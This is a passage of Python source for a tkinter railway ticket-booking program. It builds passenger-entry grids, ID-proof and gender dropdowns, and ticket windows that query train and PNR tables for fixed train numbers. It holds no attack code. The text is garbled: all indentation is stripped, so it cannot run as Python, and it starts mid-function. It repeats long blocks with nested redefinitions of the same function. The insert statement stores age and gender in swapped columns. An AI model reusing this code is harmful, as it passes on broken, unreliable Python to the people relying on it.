popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=1, column=4)
v7 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v7.set('Choose')
v7.trace("w", fun5)
popup = OptionMenu(window2, v7, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=2, column=4)
v8 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v8.set('Choose')
v8.trace("w", fun6)
popup = OptionMenu(window2, v8, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=3, column=4)
v9 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v9.set('Choose')
v9.trace("w", fun7)
popup = OptionMenu(window2, v9, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=4, column=4)
def Check1():
def Show():
global x1
window3 = Toplevel(master)  # Toplevel, matching the other ticket windows; a second Tk() root can break StringVar bindings
window3.title("Ticket")
screen_width = window3.winfo_screenwidth()
screen_height = window3.winfo_screenheight()
width = 780
height = 480
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window3.geometry('%dx%d+%d+%d' % (width, height, x, y))
window3.config(bg='gray23')
Label(window3, text="Name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=50)
Label(window3, text="Gender:",bg='dark turquoise',font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=50)
Label(window3, text="Departure time:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=90)
Label(window3, text="Age:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=90)
Label(window3, text="Class:",bg='dark turquoise',font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=130)
Label(window3, text="Train no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=130)
Label(window3, text="Train name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=170)
Label(window3, text="Source:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=210)
Label(window3, text="Destination:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=250)
Label(window3, text="No. of tickets:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=290)
Label(window3, text="PNR no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=170)
Name = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=170, y=50, height=25)
Gender = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=50, height=25)
DepartureTime = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=210, y=90,
height=25)
Age = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=90, height=25)
Class = Label(window3, justify="center",bg='white',text=variable2.get(), font=('Slab Serif', 10)).place(x=380, y=130, height=25)
TrainNumber = Label(window3, justify="center",bg='white', font=('Slab Serif', 10))
TrainNumber.place(x=170, y=130, height=25)
Source = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=170, height=25)
Destination = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=180, y=250,
height=25)
Number = Label(window3,text=count, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=290, height=25)
global conn, cursor, x1, x2
if x1 == 12236:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12236")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12240:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12240")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3,bg='white', justify="center", text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12244:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12244")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3,bg='white', justify="center", text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12248:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12248")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170,
height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
Label(window3, text="Have a happy & safe Journey!!",bg='white',fg='orange red',font=('Comic Sans MS', 23,'bold')).place(x=200, y=340)
mainloop()
count = 0  # default, as in PassengerDetails1; the final else branch relies on it
if len(enn7.get()) == 0 or len(enn8.get()) == 0 or len(enn9.get()) == 0 or len(e10.get()) == 0:
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e12.get()) != 0 and (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e17.get()) != 0 and (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e22.get()) != 0 and (len(e23.get()) == 0 or len(e24.get()) == 0 or len(e25.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(e12.get()) != 0 or len(e13.get()) != 0 or len(e14.get()) != 0 or len(
e15.get()) != 0) and (
len(e22.get()) != 0 or len(e23.get()) != 0 or len(e24.get()) != 0 or len(
e25.get()) != 0) and (
len(e17.get()) == 0 or (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(enn7.get()) != 0 or len(enn8.get()) != 0 or len(enn9.get()) != 0 or len(
e10.get()) != 0) and (
len(e17.get()) != 0 or len(e18.get()) != 0 or len(e19.get()) != 0 or len(
e20.get()) != 0) and (
len(e12.get()) == 0 or (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif enn7.get()!="" and e12.get()=="" and e17.get()=="" and e22.get()=="":
count=1
Show()
elif e12.get()!="" and e17.get()=="":
count=2
Show()
elif e17.get()!="" and e22.get()=="":
count=3
Show()
elif e22.get()!="":
count=4
Show()
else:
Show()
b = Button(window2, text='Proceed', bg="slategray3", font=('Britannic Bold', 16), command=Check1)
b.place(x=450, y=255)
mainloop()
PassengerDetails()
def PassengerDetails3():
global x1
if en22.get() == "12237":
x1 = 12237
elif en22.get() == "12241":
x1 = 12241
elif en22.get() == "12245":
x1 = 12245
else:
x1 = 12249
def PassengerDetails():
window1.destroy()
window2 = Toplevel(master)
window2.title("Passenger Details")
window2.config(bg="indianred2")
screen_width = window2.winfo_screenwidth()
screen_height = window2.winfo_screenheight()
width = 1020
height = 700
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window2.geometry('%dx%d+%d+%d' % (width, height, x, y))
height = 5
width = 5
for i in range(height): # Rows
for j in range(width): # Columns
e1 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn2 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn3 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn4 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e5 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e6 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn7 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn8 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn9 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e10 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e11 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e12 = Entry(window2, justify="center",font=('Rockwell Condensed', 11), bg="steelblue3")
e13 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e14 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e15 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e16 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e17 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e18 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e19 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e20 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e21 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e22 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e23 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e24 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e25 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e1.insert(10, "S.no")
enn2.insert(10, "Name")
enn3.insert(10, "Age")
enn4.insert(10, "Gender")
e5.insert(10, "Id_Proof")
e6.insert(10, "1")
e11.insert(10, "2")
e16.insert(10, "3")
e21.insert(10, "4")
e1.grid(row=0, column=0)
enn2.grid(row=0, column=1)
enn3.grid(row=0, column=2)
enn4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=1, column=0)
enn7.grid(row=1, column=1)
enn8.grid(row=1, column=2)
enn9.grid(row=1, column=3)
e10.grid(row=1, column=4)
e11.grid(row=2, column=0)
e12.grid(row=2, column=1)
e13.grid(row=2, column=2)
e14.grid(row=2, column=3)
e15.grid(row=2, column=4)
e16.grid(row=3, column=0)
e17.grid(row=3, column=1)
e18.grid(row=3, column=2)
e19.grid(row=3, column=3)
e20.grid(row=3, column=4)
e21.grid(row=4, column=0)
e22.grid(row=4, column=1)
e23.grid(row=4, column=2)
e24.grid(row=4, column=3)
e25.grid(row=4, column=4)
def fun(*args):
enn9.insert(10, v2.get())
def fun1(*args):
e14.insert(10, v3.get())
def fun2(*args):
e19.insert(10, v4.get())
def fun3(*args):
e24.insert(10, v5.get())
def fun4(*args):
e10.insert(10, v6.get())
def fun5(*args):
e15.insert(10, v7.get())
def fun6(*args):
e20.insert(10, v8.get())
def fun7(*args):
e25.insert(10, v9.get())
v2 = StringVar(window2)
gender = {'Male', 'Female'}
v2.set('Choose')
v2.trace("w", fun)
popupMenu1 = OptionMenu(window2, v2, *gender)
popupMenu1.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu1.grid(row=1, column=3)
v3 = StringVar(window2)
gender1 = {'Male', 'Female'}
v3.set('Choose')
v3.trace("w", fun1)
popupMenu2 = OptionMenu(window2, v3, *gender1)
popupMenu2.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu2.grid(row=2, column=3)
v4 = StringVar(window2)
gender2 = {'Male', 'Female'}
v4.set('Choose')
v4.trace("w", fun2)
popupMenu3 = OptionMenu(window2, v4, *gender2)
popupMenu3.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu3.grid(row=3, column=3)
v5 = StringVar(window2)
gender = {'Male', 'Female'}
v5.set('Choose')
v5.trace("w", fun3)
popupMenu4 = OptionMenu(window2, v5, *gender)
popupMenu4.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu4.grid(row=4, column=3)
v6 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v6.set('Choose')
v6.trace("w", fun4)
popup = OptionMenu(window2, v6, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=1, column=4)
v7 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v7.set('Choose')
v7.trace("w", fun5)
popup = OptionMenu(window2, v7, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=2, column=4)
v8 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v8.set('Choose')
v8.trace("w", fun6)
popup = OptionMenu(window2, v8, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=3, column=4)
v9 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v9.set('Choose')
v9.trace("w", fun7)
popup = OptionMenu(window2, v9, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=4, column=4)
def Check1():
def Show():
global x1
window3 = Toplevel(master)  # Toplevel, matching the other ticket windows; a second Tk() root can break StringVar bindings
window3.title("Ticket")
screen_width = window3.winfo_screenwidth()
screen_height = window3.winfo_screenheight()
width = 780
height = 480
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window3.geometry('%dx%d+%d+%d' % (width, height, x, y))
window3.config(bg='gray23')
Label(window3, text="Name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=50)
Label(window3, text="Gender:", bg='dark turquoise',font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=50)
Label(window3, text="Departure time:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=90)
Label(window3, text="Age:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=90)
Label(window3, text="Class:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=130)
Label(window3, text="Train no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=130)
Label(window3, text="Train name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=170)
Label(window3, text="Source:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=210)
Label(window3, text="Destination:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=250)
Label(window3, text="No. of tickets:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=290)
Label(window3, text="PNR no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=170)
Name = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=170, y=50, height=25)
Gender = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=50, height=25)
DepartureTime = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=210, y=90,
height=25)
Age = Label(window3, justify="center",bg='white',font=('Slab Serif', 10)).place(x=380, y=90, height=25)
Class = Label(window3, justify="center",bg='white',text=variable2.get(),font=('Slab Serif', 10)).place(x=380, y=130, height=25)
TrainNumber = Label(window3, justify="center",bg='white', font=('Slab Serif', 10))
TrainNumber.place(x=170, y=130, height=25)
Source = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=170, height=25)
Destination = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=180, y=250,
height=25)
Number = Label(window3,text=count, justify="center", bg='white',font=('Slab Serif', 9)).place(x=170, y=290, height=25)
global conn, cursor, x1, x2
if x1 == 12237:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12237")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12241:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12241")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12245:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12245")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12249:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12249")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170,
height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
Label(window3, text="Have a happy & safe Journey!!", bg='white',fg='orange red',font=('Comic Sans MS', 23,'bold')).place(x=200, y=340)
mainloop()
count = 0  # default, as in PassengerDetails1; the final else branch relies on it
if len(enn7.get()) == 0 or len(enn8.get()) == 0 or len(enn9.get()) == 0 or len(e10.get()) == 0:
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e12.get()) != 0 and (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e17.get()) != 0 and (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e22.get()) != 0 and (len(e23.get()) == 0 or len(e24.get()) == 0 or len(e25.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(e12.get()) != 0 or len(e13.get()) != 0 or len(e14.get()) != 0 or len(
e15.get()) != 0) and (
len(e22.get()) != 0 or len(e23.get()) != 0 or len(e24.get()) != 0 or len(
e25.get()) != 0) and (
len(e17.get()) == 0 or (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(enn7.get()) != 0 or len(enn8.get()) != 0 or len(enn9.get()) != 0 or len(
e10.get()) != 0) and (
len(e17.get()) != 0 or len(e18.get()) != 0 or len(e19.get()) != 0 or len(
e20.get()) != 0) and (
len(e12.get()) == 0 or (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif enn7.get()!="" and e12.get()=="" and e17.get()=="" and e22.get()=="":
count=1
Show()
elif e12.get()!="" and e17.get()=="":
count=2
Show()
elif e17.get()!="" and e22.get()=="":
count=3
Show()
elif e22.get()!="":
count=4
Show()
else:
Show()
b = Button(window2, text='Proceed', bg="slategray3", font=('Britannic Bold', 16), command=Check1)
b.place(x=450, y=255)
mainloop()
PassengerDetails()
def PassengerDetails4():
global x1
if en29.get() == "12238":
x1 = 12238
elif en29.get() == "12242":
x1 = 12242
elif en29.get() == "12246":
x1 = 12246
else:
x1=12250
def PassengerDetails():
window1.destroy()
window2 = Toplevel(master)  # Toplevel, matching the other PassengerDetails windows; a second Tk() root can break StringVar bindings
window2.title("Passenger Details")
window2.config(bg="indianred2")
screen_width = window2.winfo_screenwidth()
screen_height = window2.winfo_screenheight()
width = 1020
height = 700
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window2.geometry('%dx%d+%d+%d' % (width, height, x, y))
height = 5
width = 5
for i in range(height): # Rows
for j in range(width): # Columns
e1 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn2 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn3 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn4 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e5 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e6 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn7 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn8 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn9 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e10 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e11 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e12 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e13 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e14 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e15 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e16 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e17 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
